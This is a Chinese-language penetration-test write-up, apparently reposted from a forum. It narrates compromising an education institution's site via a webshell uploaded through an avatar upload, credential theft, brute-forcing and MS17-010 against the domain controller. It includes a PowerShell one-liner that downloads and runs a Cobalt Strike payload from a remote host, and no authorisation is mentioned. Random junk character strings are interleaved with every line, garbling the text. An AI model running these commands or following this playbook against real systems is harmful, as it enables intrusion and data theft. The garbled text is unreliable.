|
, m0 {! ]$ h+ ?( T
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路- Z# }) h! F9 p6 T
8 h5 m3 F# e$ S& I; l
; ~5 h) u3 n5 a; N) H
& R e# B2 d8 d( w4 s ) B# g7 m0 O) v
: d1 b3 Q/ `7 ^' a2 o
正文
" O1 O+ ^5 C& w) ?+ B
" L3 \6 _# U: G, N7 l! Y$ h3 |: q" p" D# L3 o1 o3 U( D' Q
& @8 V; V d; J" j( E* ?( Z
2 z* ^% v" I! j/ ~
, A7 n: Y9 L: @" c4 `/ Z 目标:www.xxxx.com(一家教育机构)
1 q2 p. B; _ Z% `" t5 r( b打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能7 L6 V+ W6 i. j3 u- ^4 }4 n
5 P- j. ~) M! i3 [# M& K
T6 @# C& B. l4 n( q) \
$ B) e+ Z; C( f9 ]' A' C 3 T8 J: y! k; u a+ O i- W
% ?# P& b% A( L+ ~; q1 X 进行了简单的信息搜集
* W; j6 K8 D; E, V
+ ~. e$ q; P9 u7 k' o7 @! I$ T" d2 r
" u0 L# k- y8 u6 N( P+ h3 M
6 H2 X( A3 I& c! d2 K1 ` 子域名搜集0 u7 Q) a B1 @* U
$ U/ ^" L, ?- i$ R0 i: l" k; K7 z
z* L. i8 S I0 h; r( p) v ( D7 e5 W' {( y, n e$ c z" _& h; v
: `; ~( F; J d5 n6 X& J; I x: f! ?: x
fofa找资产 + d6 l7 p8 x8 t' [- a0 @8 O
5 ~7 {* _3 H2 ^$ }
2 L" W1 f5 |7 l. e3 r h7 q
^5 `' k& ^* f6 X( ]8 u5 N8 @- b0 K. x3 \6 U# C$ X& r
5 a, D1 \: {! l0 Z/ D/ S7 c+ v: g' l
. O. v& p/ l0 m* c
8 R: j& a$ I* b, K$ o& ?) M 一共七个资产。去重之后只有两个。
- @1 u; u! |3 f. y' X, _ : u. l' i- B+ b0 C) m( U/ g
. S) N1 P1 h' \$ ?3 v
+ q2 m& Q% Y* j. {' U# m
8 [* |( t% P3 I, ?3 D 目录探测
( y) G4 \3 {7 }7 r, D' P
1 F I: W! R# C! Y0 U s* z* g# Y2 z; g! ?7 q! \( o2 ^* T) q
7 ^; M/ f3 }. U# y0 [5 j
$ a1 H5 T4 m( {1 W5 Q4 P" f
- \) a/ \3 A, O( \* d g
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
) G2 J: Q3 {3 L
3 ]" a% ?# X3 U' N0 Z, i( |- H9 h- a5 S: K1 r% | C5 `
: [$ u, w5 Z" ?( j( J
( G* q! T9 m3 B( r& y
我又尝试了通过修改返回包来绕过登录界面
: k: Z9 _. j) Z6 x1 b1 n
0 o) d7 n" K5 N3 ^4 _: e5 R1 H/ {8 U% {: R8 w
+ L1 K5 S1 o0 Z' `- M R% I. ~
+ W. \! u5 n/ F; P! [# ]5 _
- s' X) I5 w% ^/ k% x$ z7 h! z 还是不行,尝试注入无果
- w8 U, m5 e) W" P, Q! r# D - E+ p3 y/ u- Z0 J7 Y- u+ c3 X
/ E; ~9 r, ?: V9 x1 K6 ~! T
: @, I4 s, ?! f- k! O
3 M# [4 Q5 V0 @4 y& i, m
- W2 F$ k/ R/ w, Z7 v4 p 不过我目录探测出了一处Spring信息泄露 - z) j) D5 U' w m3 u# D
5 [) y1 Y6 r+ y" b) h/ D5 v/ h
. v" ]) u! h' R/ y5 a; {! R
6 l5 u# @/ n/ B$ W# s+ A, v7 F! w+ e2 U, R+ N
" p$ S' v7 K6 Q- o# { { , ^. K7 H9 w5 s8 V
3 }. A- b$ Y6 T2 H2 q( F% y
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 E- w% w4 E0 p5 L! r+ f
( z- N6 N4 r* h4 x3 s! T/ |6 W. | P4 Q5 s( V. V
; y" |/ U# I; S# b+ l, Z% E6 @8 h 9 `8 {1 K/ Z) Q
8 m* [' d0 E; N; _' O4 Y; `3 T 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
6 Q& f, R v* a* O* W0 T e 0 z) D: j3 T. b4 g
2 Z0 C6 ]1 I( P
6 D- ^: {. r8 }2 B
@+ t( T. x9 E" G @" r% ]) ~
6 c9 l% A3 }( l u 获取有些师傅到这一步就手机抓包电脑测了。
6 j( b u+ ]5 j/ L/ ]
* F _9 l2 T. E- o: z5 e# H q
$ H2 L* [. ?9 I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。' E7 G) v1 E" s& G' G2 Z; D7 y
0 W# {% J- D; s: x
+ \3 N- c' b$ L+ I$ N6 ?6 m! ^0 d
其中在一个公众号发现了小程序,可以进行注册。
2 l* V$ h8 G' M2 G1 y
4 H! Y8 o F0 W
) D. w; D% ] ^# a9 ~, B' ` 看到了头像上传,尝试上传获取WebShell/ {" p- | @- f$ [$ Z! k
( C0 `) w! [: s$ K
! @4 n# A) y* i q& C9 g! p7 Z; w $ t; D1 ?2 J5 P+ T* `/ s
3 A8 c6 R: s) Z& S2 S4 W
6 [: [# [, i* _, K1 f/ T) a 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 d" \+ {; n3 I* C- g6 y/ B# Z% @+ P
$ W+ k" e/ v4 Z5 T
7 e+ c0 g7 V8 a1 O3 \ ^+ ~! y) a' M( ]
+ y/ b" [" p% x
N5 m- n) J( m0 u/ j% c; r( c% a* P8 D0 v4 {& a' s( M/ _
然后上了大马
, m, {5 \" k& H$ ?2 {0 k - b- T# z3 \- @5 {: ^; A
2 j) R& h2 H4 |1 T& }, t
* m5 V( s4 L% A- i0 d: h }5 n * ^& e/ K& ]( n& ~% {. G3 m2 e
+ F5 \6 W! u9 c, J 3 L4 v: t! G9 ]' Q5 o4 w1 M: ?
& b3 M+ r q, f' J0 C! M, S' x& U. g5 `& F" g2 Z
通过翻找文件发现数据库账号密码3 J6 L6 P5 A, ], U; F
; T, e _( z: W/ ^; o
% G: G* h0 T: F, ^: { , N+ r+ H" u! T
' D4 K7 Z- {5 L3 w
- e& A( h! q; A
--内网渗透
) S6 F, ^5 h: M+ R3 h 4 O# ?: _7 K7 X2 { c8 V
' ~# `7 V" i9 Q- o5 H" I 直接通过powershell执行 cs上线
3 s1 ~1 w" i/ {/ j' c
3 w9 p5 c5 \1 C/ E4 P& k/ i
& k2 O( o/ B1 O* [! ^& J( ~7 {3 w6 } powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
6 @4 _7 `- E* @' j/ g3 f+ X
1 d! g5 h& o# Y( C1 d6 g
2 v" d4 a- M* [4 s2 C) a. v# x - q9 N+ C5 e5 |
; v) N2 M8 R4 \3 u
8 c& m( q) a0 {: l. m; _, W
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 [0 F j) F& R2 n+ x4 z0 W- ]6 ]
$ |. @( q7 m; E
3 i8 x$ e% ]' T: W* I/ g6 z
5 \0 c( b, l! L' S6 K; X0 c ! o8 R& M, G& z, q4 Q, v
+ a. b: g1 V+ z1 u6 ]
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 r# p; h/ Q$ u6 c/ U8 k9 i! E
K& j3 Y3 H$ Z% m% _/ f
* e5 {9 d) s3 l$ E5 f
3 v* J6 q3 o8 D3 i. \2 |$ L ( W; |. q4 A; O X
* y$ f+ V6 W( G* p) m" J* `
! v4 C9 {$ B! _5 L8 a
& f7 @; E2 N; U& S& }6 o" S8 r6 F* M4 J* w4 ^' u
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ F9 b) j4 d, m9 a / Y/ t5 D( m! ^0 `7 R; G
u0 F- w& o# J& L
% V! e0 `7 C* o* a
, t3 J& o( R9 u5 U* M3 {9 z6 p/ y
- r3 {' b7 B* X/ i2 a8 c; X : s$ ]" |) n+ F& E0 d" ~
& j* ?. d0 a4 i) j0 R: G
6 @* K2 g5 [* x. n
4 ?7 c/ ~( k+ c% C. J! Z2 e, D: W. H9 w4 c y1 J
7 }0 W3 h9 t6 y
D) {1 ~; E; K% g# _2 O" L
0 g P* s0 M9 y4 @3 a8 y1 p9 g3 Z9 I
- B; O1 [1 B0 Z: V* v9 K! i: @7 ~6 t$ N) ^. J5 |
小结$ t. o9 h. K0 Y4 I+ S8 E
! p0 `4 F3 l5 |) w
/ w- t+ G+ m0 g ) E6 O; m) r1 c- h! [5 G3 X
! l3 l+ _: r% l# c; \
& _& V0 E+ _1 p6 [; w7 N9 b4 Z1 d 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!6 Y- S5 Q' |0 y+ a Z
$ x; Q0 S9 y& f$ G2 p- Y
- s+ j$ {( `3 v2 _4 H+ @+ b , [% n' ?, i Y! M. c* m9 Z
6 Z3 M/ u6 j O9 s
* |. e+ T1 O) L: ^$ l, C -
- [" b$ ?. D' Q$ X* | & ?& E: q# b! `$ D3 G4 K
& n7 |6 B! k/ |0 x6 }
- / [8 {% U+ C3 E
* c( E' b( r3 O
" @" ~8 c% g: W- }+ o6 G5 f% \
& T9 D$ C1 W! V- M8 z0 y1 Z
2 }: @2 g2 P* b* |( s- d 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html u1 j- H) C9 A2 S2 v4 x
, O( Q$ I! M, {+ r
; g8 ]. {$ H" a8 ?; h 9 U0 l. _4 f" G4 q5 {& `6 I
|